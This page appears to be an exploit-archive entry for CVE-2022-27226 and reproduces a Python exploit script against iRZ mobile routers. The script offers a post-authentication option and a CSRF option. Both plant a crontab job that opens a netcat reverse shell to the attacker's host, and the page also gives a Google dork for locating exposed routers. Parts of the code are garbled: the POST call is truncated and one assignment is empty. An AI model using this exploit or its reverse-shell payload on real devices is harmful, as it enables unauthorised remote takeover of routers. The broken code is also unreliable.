irz mobile router csrf to rce

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# Exploit Title: iRZ Mobile Router - CSRF to RCE # Google Dork: intitle:"iRZ Mobile Router" # Date: 2022-03-18 # Exploit Author: Stephen Chavez & Robert Willis # Vendor Homepage: # Software Link: # Version: Routers through 2022-03-16 # Tested on: RU21, RU21w, RL21, RU41, RL01 # CVE : CVE-2022-27226 import os import requests import json import subprocess option = "0" def main(): print("####################################################") print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") print("####################################################") print() print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") print() print("1. Post Authentication RCE (Needs Credentials)") print("2. CSRF to RCE (No Credentials)") print() runit() def runit(): option = input("Select an option: ") if option == "1": exploit1() elif option == "2": exploit2() else: print("You must select '1' or '2'. Exiting.") def exploit1(): print("## Running Post Auth RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") router_user = input("## Enter the username for the router login: ") router_pass = input("## Enter the password for the router login: ") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") router_url = f'http://{router_ip}:{router_port}' nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' input(nc1_str + "\n\nPress enter once you do") send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): intro = f'Sending the payload to {router_url}\n' print(intro) payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ f'{lhost_ip} {lhost_port} ' + \ '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' payload_json = json.loads(payload_str) s = requests.Session() s.auth = (router_user, router_pass) s.headers.update( {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) s.headers.update({"X-Requested-With": "XMLHttpRequest"}) s.headers.update({"Origin": router_url}) s.headers.update({"Referer": router_url}) + "/api/crontab", json=payload_json) exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' print( "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str) print("To fix TTY: type telnet in the shell") def exploit2(): print("## Running CSRF to RCE exploit") print() print() router_ip = input("## Enter the router ip to exploit: ") router_port = int( input("## Enter the victim router web page port (default is 80): ") or "80") LHOST = input("## Enter the LHOST for the router reverse shell: ") LPORT = input("## Enter the LPORT for the router reverse shell: ") load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" if os.path.isfile(file_path): with open(file_path) as poc_file: original_poc_data_str = new_html = original_poc_data_str.replace("{router_ip}", router_ip) new_html = new_html.replace( "{router_port}", str(router_port)) lhost_split_arr = lhost_ip.split(".") if len(lhost_split_arr) == 4: new_html = new_html.replace( "{lhost_ip_octect_1}", lhost_split_arr[0]) new_html = new_html.replace( "{lhost_ip_octect_2}", lhost_split_arr[1]) new_html = new_html.replace( "{lhost_ip_octect_3}", lhost_split_arr[2]) new_html = new_html.replace( "{lhost_ip_octect_4}", lhost_split_arr[3]) new_html = new_html.replace( "{lhost_port}", lhost_port) new_file_path = os.path.dirname( __file__) + os.sep + "" try: with open(new_file_path, 'w') as new_file: new_file.write(new_html) print() print( f'New file written to {new_file_path}. Host this file') except FileNotFoundError: print("You had an error writing to the file, doesn't exist.") else: print(f'{lhost_ip} is not a proper IPV4 address.') else: print(f'{file_path} not found') main()

Irz mobile router csrf to rce Vulnerability / Exploit Source : Irz mobile router csrf to rce

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